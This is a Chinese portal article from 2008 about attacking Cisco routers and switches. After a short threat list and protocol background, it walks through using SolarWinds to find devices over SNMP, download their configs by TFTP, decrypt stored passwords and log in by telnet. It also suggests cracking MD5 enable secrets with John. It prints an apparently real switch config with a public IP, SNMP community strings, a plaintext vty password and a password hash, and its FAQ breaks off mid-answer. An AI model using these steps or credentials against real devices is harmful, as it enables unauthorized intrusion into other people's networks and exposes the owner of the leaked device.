分享
 
 
 

关于思科安全方面的文章

王朝other·作者佚名  2008-05-19
窄屏简体版  字體: |||超大  

一:可以对园区网设备施加的具体威胁,也可以理解为攻击思路,目标或手段

1:访问设备的控制端口和TELNET端口

2:访问路由器配置文件和了解口令

3:通过SNMP访问设备的配置文件并了解内部网络的拓扑结构

4:通过截获路由更新信息了解内部网络的拓扑结构

5:通过虚假的路由更新信息误导数据流的转发

6:访问敏感的内部网络

7:获得对路由器的HTTP访问

8:对或通过以太网交换机的非授权访问

二:几个基本知识

1:telnet是一种强有力的服务,它能为用户提供很多internet设施和服务的唯一访问手段,允许用户以明文方式远程访问一个命令界面,由简单的用户名/口令认证机制所控制,很容易被欺骗。telnet端口在路由器上被称为虚拟终端(vty)端口;

2:tftp不是一种安全的协议,因为它没有任何认证机制,也就是说不需要口令,入侵者可以很容易地用tftp请求文件传输,其可以用于得到路由配置文件并修改之;

3:SNMP是一个应用层协议,它在SNMP管理器和代理之间提供了一个通信管道,SNMP有多种访问级别:RO(只读),RW(读/写),W(允许对代理进行写操作)。SNMP团体

字符对MIB对象的访问进行认证,并作为嵌入的口令;

4:CISCO口令分为用户访问口令和特权级口令(enable)。缺省情况下,路由器上所有控制台口令是以明文形式存储在路由器配置中。有两种用于隐藏明文形式的口令:(一

般地)"Service password_encryption"命令用于加密用户访问口令,"enable

secret"命令用于加密特权级口令,"Service password_encryption"命令所用的加密算法是一种不太复杂的可逆的基于Vigener密码的CISCO专有算法,安全级别低,有大量破解器能反

解CISCO口令;而"enable secret"则用到了一个基于MD5散列函数的单向加密算法,安全级别较高,目前尚无良好解决方法,但其仍然可能会受到强力破解或口令字典的攻击。

三:利用solarwinds2001得到CISCO密码

1:solarwinds2001是个集多种功能于一身的cisco管理工具,界面友好;

2:下载地址(52M左右)

http://solarwinds.net/Download-Tools.htm

http://download.online.tj.cn/software/internet/netassistant/15411. html

http://peckerland.com/library/solarwinds2001.zip

3:工具条如下左图所示,酷似QQ,清晰明了!

4:打开Cisco Tools/IP Network Browser,界面如下图,简单设置如上右图;

5:发现CISCO路由器

6:还可以用Cisco Tools/Download Config来下载(下图)

7:TFTP Server自动启动(下图)

8:利用Cisco Tools/Config Editor&viewer打开下载的config文件,如下是我下载的一份配置文件:

!

version 11.2

no service pad

no service udp-small-servers

no service tcp-small-servers

!

hostname HGHLNDSWSTWD.07.IDF1A.DSW08

!

enable secret 5 $1$ukn/$LU0yrd7/YBqBNJRDlIVes.---MD5加密

!

!

ip subnet-zero

!

!

interface VLAN1

ip address 209.11.111.8 255.255.255.192

no ip route-cache

!

interface FastEthernet0/1

description Port connected to Apt# 7307

shutdown

port security max-mac-count 1

no port security action trap

!

interface FastEthernet0/2

description Port connected to Apt# 7308

port security max-mac-count 1

no port security action trap

!

interface FastEthernet0/3

description Port connected to Apt# 7309

shutdown

port security max-mac-count 1

no port security action trap

!

interface FastEthernet0/4

description Port connected to Apt# 7310

shutdown

port security max-mac-count 1

no port security action trap

!

interface FastEthernet0/5

description Port connected to Apt# 7311

shutdown

port security max-mac-count 1

no port security action trap

!

interface FastEthernet0/6

description Port connected to Apt# 7337

port security max-mac-count 1

no port security action trap

!

interface FastEthernet0/7

description Port connected to Apt# 7338

shutdown

port security max-mac-count 1

no port security action trap

!

interface FastEthernet0/8

description Port connected to Apt# 7339

shutdown

port security max-mac-count 1

no port security action trap

!

interface FastEthernet0/9

description Port connected to Apt# 7340

shutdown

port security max-mac-count 1

no port security action trap

!

interface FastEthernet0/10

description Port connected to Apt# 7341

shutdown

port security max-mac-count 1

no port security action trap

!

interface FastEthernet0/11

description Port connected to Apt#

shutdown

port security max-mac-count 1

no port security action trap

!

interface FastEthernet0/12

description Port connected to Apt#

shutdown

port security max-mac-count 1

no port security action trap

!

interface FastEthernet0/13

description Port connected to Apt#

shutdown

port security max-mac-count 1

no port security action trap

!

interface FastEthernet0/14

description Port connected to Apt#

shutdown

port security max-mac-count 1

no port security action trap

!

interface FastEthernet0/15

description Port connected to Apt#

shutdown

port security max-mac-count 1

no port security action trap

!

interface FastEthernet0/16

description Port connected to Apt#

shutdown

port security max-mac-count 1

no port security action trap

!

interface FastEthernet0/17

description Port connected to Apt#

shutdown

port security max-mac-count 1

no port security action trap

!

interface FastEthernet0/18

description Port connected to Apt#

shutdown

port security max-mac-count 1

no port security action trap

!

interface FastEthernet0/19

description Port connected to Apt#

shutdown

port security max-mac-count 1

no port security action trap

!

interface FastEthernet0/20

description Port connected to Apt#

shutdown

port security max-mac-count 1

no port security action trap

!

interface FastEthernet0/21

description Port connected to Apt#

shutdown

port security max-mac-count 1

no port security action trap

!

interface FastEthernet0/22

description Port connected to Apt#

shutdown

port security max-mac-count 1

no port security action trap

!

interface FastEthernet0/23

description Port connected to Fiber Link

!

interface FastEthernet0/24

description Port connected to Fiber Link

!

ip default-gateway 209.11.111.1

mac-address-table secure 0001.0235.5a4e FastEthernet0/2 vlan 1

snmp-server community N3tw0rk RO

snmp-server community private RW

snmp-server community public RO

snmp-server chassis-id 0x0F

!

line con 0

stopbits 1

line vty 0 4

password MDU!Admin --明文口令,未作加密处理!!

login

line vty 5 9

password MDU!Admin

login

!

end

9:如果配置文件中口令经"Service password_encryption"命令加密,比如说出现 “password 7 15110E1E2A2F3F”类的,用Cisco Tools/Router Password de..解密,如下图:

10:现在你就可以telnet *.*.*.* 进入了!

11:常见问题:

(1)为什么老是下载不了config?

答:正常!有几个原因,无法辨别读取,路由器拒绝,TFTP server未设置添加允许传输IP段...要有点耐心,现在存在此漏洞的很多!

(2)MD5加密的特权级口令怎么破解?

答:很难,但可以拿John跑跑。不妨拿用户级访问口令一试,有些路由的两个口令一样!

(3)为什么我拿到了密码却telnet不上?

答:telnet不上是因为

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有